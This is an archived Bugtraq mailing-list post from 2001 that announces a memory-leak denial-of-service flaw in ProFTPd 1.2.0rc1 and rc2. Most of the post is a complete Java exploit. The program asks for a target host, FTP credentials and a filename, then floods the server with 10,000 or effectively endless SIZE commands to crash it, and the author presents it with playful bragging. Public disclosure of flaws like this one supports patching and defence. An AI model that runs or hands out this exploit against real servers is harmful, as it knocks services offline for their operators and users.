OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: JeT Li (jet_li_manYAHOO.COM)
Date: Tue Jan 09 2001 - 11:50:53 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

            Hello Bugtraq:

            Not so much time ago a ProFTPd remote vulnerability was released:

    " ProFTPd has memory leakage bug when it executes the SIZE FTP command. By
    calling the FTP command SIZE 5000 times it possible to cause ProFTPd to
    consume over 300kB of memory. Exploiting this bug with more SIZE commands
    gives us simple DoS attack. Anonymous access is sufficient to use SIZE
    commands and to exploit this bug."

            I have coded a program that do more than 5000 size's requests to the
    server, in order to crash it. ¿Why in Java? well I think the procedure is
    enough simple to needn't code it in c. In addition, ¿Why not in Java? ;-) we
    don't need various versions of the program for Linux, BSD, Solaris, etc; there
    is an unique program for all the OS and architectures. I wanna bet in favor of
    the use of Java to code next generation xploits & DoS ;-)

    Vulnerability: Remote DoS in ProFTPd
    Requirements: Anonymous or normal user access
    Vulnerable systems:
            ProFTPd 1.2.0rc1 (Tested)
            ProFTPd 1.2.0rc2 (Tested)
            And maybe others (1.2.0preX); I have no test this, but I'm sure you can
    do it for me ;-)

            And now, here is the code:

    proftpDoS.java
    -----------------------
    /* Remote DoS in proFTPd
            Code by: JeT-Li -The Wushu Master- jet_li_manyahoo.com

            Well here is a little explanation about the concept of the DoS:
            ProFTPd has memory leakage bug when it executes the SIZE FTP command. By
            calling the FTP command SIZE 5000 times it possible to cause ProFTPd
            to consume over 300kB of memory. Exploiting this bug with more SIZE
            commands gives us simple DoS attack. Anonymous access is
            sufficient to use SIZE commands and to exploit this bug.

            You don't have to give arguments when you execute the program, it will
            request you these.

            Greets: _kiss_ (the real fucker ;-P); gordoc (no comment, the most
            hax man in the w0rld); Perip|o (tibetan mantras for u! ;-P); and all
            the ppl of #hackers (not able for cardiac XD).

            Vulnerable systems:
            ProFTPd 1.2.0rc1 (Tested)
            ProFTPd 1.2.0rc2 (Tested)
            And maybe others (1.2.0preX); I have no test this, but I'm sure you can
            do it for me ;-)
    */

    import java.net.*;
    import java.io.*;

    class TCPconnection {

        public TCPconnection (String hostname, int portnumber) throws Exception {
        Socket s = doaSocket(hostname, portnumber);
        br = new BufferedReader (new InputStreamReader (s.getInputStream()));
        ps = new PrintStream (s.getOutputStream());
        }

        public String readLine() throws Exception {
        String s;
        try { s = br.readLine(); }
        catch (IOException ioe) {
        System.out.println("TCP Error ... it's a little hax0r exception ;-)");
        throw new Exception ("\nInput Error: I/O Error");
            }
        return s;
        }

        public void println(String s) {
            ps.println(s);
        }

        private Socket doaSocket(String hostname, int portnumber) throws Exception {
        Socket s = null;
        int attempts = 0;
        while (s == null && attempts<maxattempts) {
        try { s = new Socket(hostname, portnumber); }
        catch (UnknownHostException uhe) {
        System.err.println("It was no posible to establish the TCP connection.\n" + "Reason: unknown hostname " + hostname + ". Here is the Exception:");
        throw new Exception("\nConnection Error: " + "unknown hostname");
        }
        catch (IOException ioe) {
        System.err.println("The connection was not accomplished due to an I/O Error: trying it again ...");
        }
        attempts++;
        }
        if (s == null) throw new IOException("\nThe connection was not accomplished due to an I/O Error: trying it again ...");
        else return s; }
        private final int maxattempts = 5;
        private BufferedReader br;
        private PrintStream ps;

        }

    class proftpDoS {

        public static void main(String[] arg) throws Exception {
        InputStreamReader isr;
        BufferedReader tcld;
        String hostnamez, username, password, file, s1, option;
        int i, j, k;
        isr = new InputStreamReader(System.in);
        tcld = new BufferedReader(isr);
        System.out.println("ProFTPd DoS by JeT-Li -The Wushu Master-");
        System.out.println("Code in an attempt to solve Fermat Last's Theoreme");
        hostnamez = "";
        while (hostnamez.length()==0) {
        System.out.print("Please enter the hostname/IP: ");
        hostnamez = tcld.readLine(); }
        username = "";
        while (username.length()==0) {
        System.out.print("Enter the username: ");
        username = tcld.readLine(); }
        password = "";
        while (password.length()==0) {
        System.out.print("Enter the password for that username: ");
        password = tcld.readLine(); }
        file = "";
        while (file.length()==0) {
        System.out.print("Enter a valid filename on the FTP \n(with correct path of course ;-): ");
        file = tcld.readLine(); }
        System.out.println("Choose one of this options; insert only the NUMBER, i.e.: 1");
        System.out.println("1) Request 10000 size's to the server (it may be enough)");
        System.out.println("2) \"No pain no gain\" (pseudo-eternal requests, ey it may be harm ;-P)");
        System.out.print("Option: ");
        option = tcld.readLine();
        k = Integer.parseInt(option);
        while (!(k==1 || k==2)) {
        System.out.print("Option not valid, please try again: ");
        option = tcld.readLine();
        k = Integer.parseInt(option); }
        TCPconnection tc = new TCPconnection(hostnamez, 21);
        tc.println("user " + username);
        tc.println("pass " + password);
        if (k==1) {
            for(i=0;i<10000;i++)
            tc.println("size " + file); }
        else if (k==2) {
        for(i=1;i<100;i++)
            for(j=2;j<((int)Math.pow(j,i ));j++)
                tc.println("size " + file); }
        tc.println("quit");
        s1 = tc.readLine();
        while (s1!=null) {
        s1 = tc.readLine();
        System.out.println("Attack completed ... as one of my friends says:");
        System.out.println("Hack just r0cks ;-)");
        }
        }
    }
    -----------------------

            Well, that's all folks ;-) Sorry for my poor english, you can send any
    dude or whatever you want to: jet_li_manyahoo.com

                                                    JeT Li -The Wushu Master-

    __________________________________________________
    Do You Yahoo!?
    Talk to your friends online with Yahoo! Messenger.
    http://im.yahoo.com